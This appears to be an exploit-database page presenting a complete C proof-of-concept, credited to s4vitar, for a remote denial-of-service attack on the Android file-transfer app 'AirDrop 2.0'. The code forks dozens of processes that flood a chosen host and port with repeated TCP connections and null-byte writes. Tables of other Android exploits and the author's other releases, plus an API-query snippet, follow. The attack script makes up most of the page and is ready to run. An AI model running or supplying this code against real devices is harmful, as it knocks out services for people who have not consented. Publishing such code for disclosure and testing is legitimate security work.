Become a patron and gain access to the dashboard, Schedule scans, API and Search patron
Author
s4vitar
Platform
android
Release date
2019-02-21
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 | #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdint.h> #include <unistd.h> #include <netdb.h> #include <signal.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <arpa/inet.h> // ************************************************************************ // * Author: Marcelo Vázquez (aka s4vitar) * // * AirDrop 2.0 Remote Denial of Service (DoS) * // ************************************************************************ // Exploit Title: AirDrop 2.0 Remote Denial of Service (DoS) // Date: 2019-02-21 // Exploit Author: Marcelo Vázquez (aka s4vitar) // Vendor Homepage: https://support.apple.com/en-us/HT204144 // Software Link: https://apkpure.com/airdrop-wifi-file-transfer/com.airdrop.airdroid.shareit.xender.filetransfer // Version: <= AirDrop 2.0 // Tested on: Android int make_socket(char *host, char *port) { struct addrinfo hints, *servinfo, *p; int sock, r; memset(&hints, 0, sizeof(hints)); hints.ai_family = AF_UNSPEC; hints.ai_socktype = SOCK_STREAM; if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) { fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r)); exit(0); } for(p = servinfo; p != NULL; p = p->ai_next) { if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) { continue; } if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) { close(sock); continue; } break; } if(p == NULL) { if(servinfo) freeaddrinfo(servinfo); fprintf(stderr, "No connection could be made\n"); exit(0); } if(servinfo) freeaddrinfo(servinfo); fprintf(stderr, "[Connected -> %s:%s]\n", host, port); return sock; } void broke(int s) { // Nothing to do } #define CONNECTIONS 8 #define THREADS 48 void attack(char *host, char *port, int id) { int sockets[CONNECTIONS]; int x, g=1, r; for(x=0; x!= CONNECTIONS; x++) sockets[x]=0; signal(SIGPIPE, &broke); while(1) { for(x=0; x != CONNECTIONS; x++) { if(sockets[x] == 0) sockets[x] = make_socket(host, port); r=write(sockets[x], "\0", 1); if(r == -1) { close(sockets[x]); sockets[x] = make_socket(host, port); } } usleep(300000); } } int main(int argc, char **argv) { int x; if (argc < 3) { printf("Usage: ./AirDrop_DoS <ip-address> <port>\n"); exit(-1); } for(x=0; x != THREADS; x++) { if(fork()) attack(argv[1], argv[2], x); usleep(200000); } getc(stdin); return 0; } |
Release Date | Title | Type | Platform | Author |
---|---|---|---|---|
2020-07-02 | "WhatsApp Remote Code Execution - Paper" | webapps | android | "ashu Jaiswal" |
2020-02-24 | "Android Binder - Use-After-Free (Metasploit)" | local | android | Metasploit |
2020-01-14 | "WeChat - Memory Corruption in CAudioJBM::InputAudioFrameToJBM" | dos | android | "Google Security Research" |
2020-01-14 | "Android - ashmem Readonly Bypasses via remap_file_pages() and ASHMEM_UNPIN" | dos | android | "Google Security Research" |
2019-11-08 | "Android Janus - APK Signature Bypass (Metasploit)" | local | android | Metasploit |
2019-10-16 | "Whatsapp 2.19.216 - Remote Code Execution" | remote | android | "Valerio Brussani" |
2019-10-04 | "Android - Binder Driver Use-After-Free" | local | android | "Google Security Research" |
2019-08-30 | "Canon PRINT 2.5.5 - Information Disclosure" | local | android | 0x48piraj |
2019-07-24 | "Android 7 < 9 - Remote Code Execution" | remote | android | "Marcin Kozlowski" |
2019-07-15 | "Android 7 - 9 VideoPlayer - 'ihevcd_parse_pps' Out-of-Bounds Write" | dos | android | "Marcin Kozlowski" |
Release Date | Title | Type | Platform | Author |
---|---|---|---|---|
2019-10-16 | "X.Org X Server 1.20.4 - Local Stack Overflow" | local | linux | s4vitar |
2019-06-14 | "CentOS 7.6 - 'ptrace_scope' Privilege Escalation" | local | linux | s4vitar |
2019-06-10 | "Ubuntu 18.04 - 'lxd' Privilege Escalation" | local | linux | s4vitar |
2019-03-15 | "NetData 1.13.0 - HTML Injection" | webapps | multiple | s4vitar |
2019-02-28 | "FTP Server 1.32 - Denial of Service" | dos | android | s4vitar |
2019-02-21 | "AirDrop 2.0 - Denial of Service (DoS)" | dos | android | s4vitar |
2019-02-21 | "ScreenStream 3.0.15 - Denial of Service" | dos | android | s4vitar |
2019-02-15 | "AirMore 1.6.1 - Denial of Service (PoC)" | dos | android | s4vitar |
2019-02-14 | "ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (PoC)" | dos | android | s4vitar |
2019-02-11 | "AirDroid 4.2.1.6 - Denial of Service" | dos | android | s4vitar |
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/46445/?format=json')
For full documentation follow the link above